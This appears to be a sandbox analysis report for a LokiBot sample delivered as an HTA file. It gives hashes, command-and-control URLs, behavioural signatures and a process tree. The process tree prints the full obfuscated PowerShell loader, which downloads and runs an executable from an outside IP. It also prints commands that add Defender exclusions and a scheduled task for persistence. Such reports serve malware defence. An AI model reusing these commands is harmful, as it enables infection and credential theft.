Analysis
-
max time kernel
134s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
18-11-2024 17:36
Static task
static1
Behavioral task
behavioral1
Sample
givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta
Resource
win10v2004-20241007-en
General
-
Target
givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta
-
Size
178KB
-
MD5
e80a6dc30c45134e8c433ef07277022f
-
SHA1
9041ab7b0cf03e4c18f86ff32eac95c3ad06f462
-
SHA256
11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182
-
SHA512
6156f6fcb24fedaabb7d1d62a0ff71e7bd8c6ab194c1a5c1b7ccc25644ba36dd62a79a8989dba98015044502a64db5c32187b802cc42dc964f25323c352519d8
-
SSDEEP
96:4vCl17nlkfktbLVe4I9qWs5cew1WyNk6O5Q:4vCldn+s9he4CqWj26O5Q
Malware Config
Extracted
lokibot
http://94.156.177.95/simple/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2884 pOwersheLl.eXe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1464 powershell.exe 1420 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2884 pOwersheLl.eXe 3000 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 2364 caspol.exe 2124 caspol.exe 2184 caspol.exe -
Loads dropped DLL 3 IoCs
pid Process 2884 pOwersheLl.eXe 2884 pOwersheLl.eXe 2884 pOwersheLl.eXe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2364 set thread context of 2184 2364 caspol.exe 45 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOwersheLl.eXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caspol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1260 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2884 pOwersheLl.eXe 3000 powershell.exe 1464 powershell.exe 1420 powershell.exe 2364 caspol.exe 2364 caspol.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2884 pOwersheLl.eXe Token: SeDebugPrivilege 3000 powershell.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeDebugPrivilege 1420 powershell.exe Token: SeDebugPrivilege 2364 caspol.exe Token: SeDebugPrivilege 2184 caspol.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 1824 wrote to memory of 2884 1824 mshta.exe 30 PID 1824 wrote to memory of 2884 1824 mshta.exe 30 PID 1824 wrote to memory of 2884 1824 mshta.exe 30 PID 1824 wrote to memory of 2884 1824 mshta.exe 30 PID 2884 wrote to memory of 3000 2884 pOwersheLl.eXe 32 PID 2884 wrote to memory of 3000 2884 pOwersheLl.eXe 32 PID 2884 wrote to memory of 3000 2884 pOwersheLl.eXe 32 PID 2884 wrote to memory of 3000 2884 pOwersheLl.eXe 32 PID 2884 wrote to memory of 2684 2884 pOwersheLl.eXe 33 PID 2884 wrote to memory of 2684 2884 pOwersheLl.eXe 33 PID 2884 wrote to memory of 2684 2884 pOwersheLl.eXe 33 PID 2884 wrote to memory of 2684 2884 pOwersheLl.eXe 33 PID 2684 wrote to memory of 2752 2684 csc.exe 34 PID 2684 wrote to memory of 2752 2684 csc.exe 34 PID 2684 wrote to memory of 2752 2684 csc.exe 34 PID 2684 wrote to memory of 2752 2684 csc.exe 34 PID 2884 wrote to memory of 2364 2884 pOwersheLl.eXe 36 PID 2884 wrote to memory of 2364 2884 pOwersheLl.eXe 36 PID 2884 wrote to memory of 2364 2884 pOwersheLl.eXe 36 PID 2884 wrote to memory of 2364 2884 pOwersheLl.eXe 36 PID 2364 wrote to memory of 1464 2364 caspol.exe 38 PID 2364 wrote to memory of 1464 2364 caspol.exe 38 PID 2364 wrote to memory of 1464 2364 caspol.exe 38 PID 2364 wrote to memory of 1464 2364 caspol.exe 38 PID 2364 wrote to memory of 1420 2364 caspol.exe 40 PID 2364 wrote to memory of 1420 2364 caspol.exe 40 PID 2364 wrote to memory of 1420 2364 caspol.exe 40 PID 2364 wrote to memory of 1420 2364 caspol.exe 40 PID 2364 wrote to memory of 1260 2364 caspol.exe 42 PID 2364 wrote to memory of 1260 2364 caspol.exe 42 PID 2364 wrote to memory of 1260 2364 caspol.exe 42 PID 2364 wrote to memory of 1260 2364 caspol.exe 42 PID 2364 wrote to memory of 2124 2364 caspol.exe 44 PID 2364 wrote to memory of 2124 2364 caspol.exe 44 PID 2364 wrote to memory of 2124 2364 caspol.exe 44 PID 2364 wrote to memory of 2124 2364 caspol.exe 44 PID 2364 wrote to memory of 2184 2364 caspol.exe 45 PID 2364 wrote to memory of 2184 2364 caspol.exe 45 PID 2364 wrote to memory of 2184 2364 caspol.exe 45 PID 2364 wrote to memory of 2184 2364 caspol.exe 45 PID 2364 wrote to memory of 2184 2364 caspol.exe 45 PID 2364 wrote to memory of 2184 2364 caspol.exe 45 PID 2364 wrote to memory of 2184 2364 caspol.exe 45 PID 2364 wrote to memory of 2184 2364 caspol.exe 45 PID 2364 wrote to memory of 2184 2364 caspol.exe 45 PID 2364 wrote to memory of 2184 2364 caspol.exe 45 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe"C:\Windows\sYStem32\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe" "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; INvoKe-eXPrEssIOn($(InvoKe-eXPRessIon('[sYsteM.tExT.eNcODing]'+[ChaR]0x3A+[cHAr]58+'utF8.GetstrIng([SYStEM.CoNVErT]'+[cHAr]58+[CHaR]58+'FROmbASE64STRinG('+[ChAR]34+'JFo3VE02ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFckRFZmluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnJwdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGaUVJdnlPaGJJcyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWVCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPZ2NBUnYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo3VE02OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjQzLjEzNi8zNy9jYXNwb2wuZXhlIiwiJGVuVjpBUFBEQVRBXGNhc3BvbC5leGUiLDAsMCk7c1RBUlQtc0xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjYXNwb2wuZXhlIg=='+[CHAr]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gcy1gdzu.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B68.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7B67.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2752
-
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pYSJOdJUV.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYSJOdJUV" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2FB8.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1260
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
PID:2124
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2184
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD560938ba734d356cdbd0088a2a125ceb9
SHA1ed0f625527cf7e380748ed5f0bc4cf3d8457782d
SHA2569988b58e97bb2246945c02de05fa4c74c087a679720b60e2bec77bfe9e6f02f6
SHA5121ce350ad62ef4350a106f56de4151ebaebb49327930c94a03f0995d81dcfd0b63bf6d8b7cc95a85e0e6903f43003f192fe02fbcac631c60a0ef7bc3181e799d3
-
Filesize
3KB
MD564a5e8597d9c10d936f454bee6b73ada
SHA17a20d3b6eb7ebae39b4d18ef3d19953903c9b970
SHA2567c912db647b5a92d82d832246b35b6d79c9cce29a3e849f61b6b9b694afbd5ec
SHA5121c8e07acf2658dff805e49dc3979d97be1a2e2ba291af1ed681a6f1a61ec98dc27035ec27bc195c4c51c69e68b72544ce7cbae67abe504d359af4cdb175695c8
-
Filesize
7KB
MD550c5616b4162a22d4a4eec06178f67e3
SHA1cdada22ff816ea188e11247da184d9140d336c26
SHA256669ca6e2cfa316c5a9938884cf919a2757918928f40be9912e7626c4b35153cc
SHA51273f15ed96a6aea579d22fde0d975aa1466f282b0ee3f7a9d603650dacda40aaf1cf8efdad5f0cc17c163f2ba7fed2a7595ab534e6c5fd88e5224e2910309ba31
-
Filesize
1KB
MD506936a3c1db83f5c87bca803fc45306b
SHA15bf371b8f1c9204bbf48f3a31d664bafd16b9fbd
SHA25668a60050215e39d48e3032d5826bb5282009308721c71a9556a8056377ecae8e
SHA5129281d5c736c1f34debd8713e71ec2435cd8edaff281c6bbf9afdec29e359804487e247ba9ae3acd9442e4ecc51a6537900b390fc753dd521bac0f785fc46ffd9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2039016743-699959520-214465309-1000\0f5007522459c86e95ffcc62f32308f1_d58f30ce-7498-4544-8c46-d67b11e386bc
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2039016743-699959520-214465309-1000\0f5007522459c86e95ffcc62f32308f1_d58f30ce-7498-4544-8c46-d67b11e386bc
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5baafe88179dc4258625508d251e9433b
SHA1a18d3fcca419ef0189bc27c5c11f2d8650414c6f
SHA256fd31e9a08ad49185902a5b4d363753e84a30f594b0b737ae35344ff3ad8e3f3d
SHA512cac5cea7d219ffbd2d3cb5ab4a6e24d0ce86762c2672bffcf8431b5ef6e0a4aa37886e1dcb340aedee20f2450264977b787668b60117b5104917a1a6be4e263a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD50c4b894cedbe547fb993389e509e9669
SHA1be2b9f698731cf7b75848d46e8101d8a9c40c724
SHA2561e2d142b7709e15454691457c51df3fad9f885ad7dd8dca80c78501ba8d49fea
SHA5120cd0ac75661c7f7de5d2ba2d30b922aba8086547a4db9fc956682a8f553d3a770fe956cb63087831b55a696553963957ffb2f2b8a6a1089adf9900d8608a8cd6
-
Filesize
568KB
MD5318ff90d7a2797a041b836f7f8900f62
SHA1fdda6afed7a1643ae353e7a635e6744c2b0a07d5
SHA256241d0df35796a2c2ae0ae4af70ef9e6571c23536fef35c1c0c172d703203a430
SHA512808942ba5db2e4d3d1d29a52c065acad4fcaae328dc43a3b977234f1b58d2838abf73d03b0992cd0f5ac4939e29f354c6c2ea25a4822a461b8ef74cec0eb3aac
-
Filesize
652B
MD576ebb156653c2f2789cb1a49d039662e
SHA12a2025c0e92660609bfe05727954bb7ed801b9b4
SHA256e7b27d0922fd596ad5adc8b018bcbd7bdd3898be1760736626c1b7275b5ded01
SHA512bc2d7ec16be6b074a8f369ce81c54f5ee4ba417f3f320a6debab3c1fc86202718c3a79fe083d36b684770bf349a8de042aa492a43b9421f9191f5b414c077c69
-
Filesize
464B
MD5f8419bbc398e1a2b134eec88b333f8f6
SHA157ebba4cad00272da80b919df0908ec40f9be48a
SHA25625fccfa20b9b6d921f804167f1637df00cdd3203af9c0313f99de7c6e9989db3
SHA512b1f4044b7a62e1de69d8e4a8ebf4db6bb24fd40d486ec5e44bd3e6b835e62ef5078c79236ded9c21ce1b0acd3575acaf1908f4fcc6ee12f1fd5f7455c4b14674
-
Filesize
309B
MD5e46d949b3b806672dff146631e084b22
SHA1ce4dbfcf962c55079a02fe2175d5f79dc2f6241d
SHA256bd13fd164b3c8e4242112fa1e450c5dcd0ff8dd4533c356d0b99233fa8b3fa82
SHA512771aa6e00336cb991eea0213391fb7a574812ab537dabb0c26e465423ade39af7240c3572658e5e90a03dd77fbbf419af5d7146dfea4e4d388b243fc48b8616f